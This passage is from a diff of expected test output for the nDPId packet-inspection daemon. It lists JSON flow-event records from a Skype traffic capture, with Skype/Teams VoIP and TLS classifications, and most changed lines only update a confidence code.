{"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
@@ -1338,7 +1338,7 @@ 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 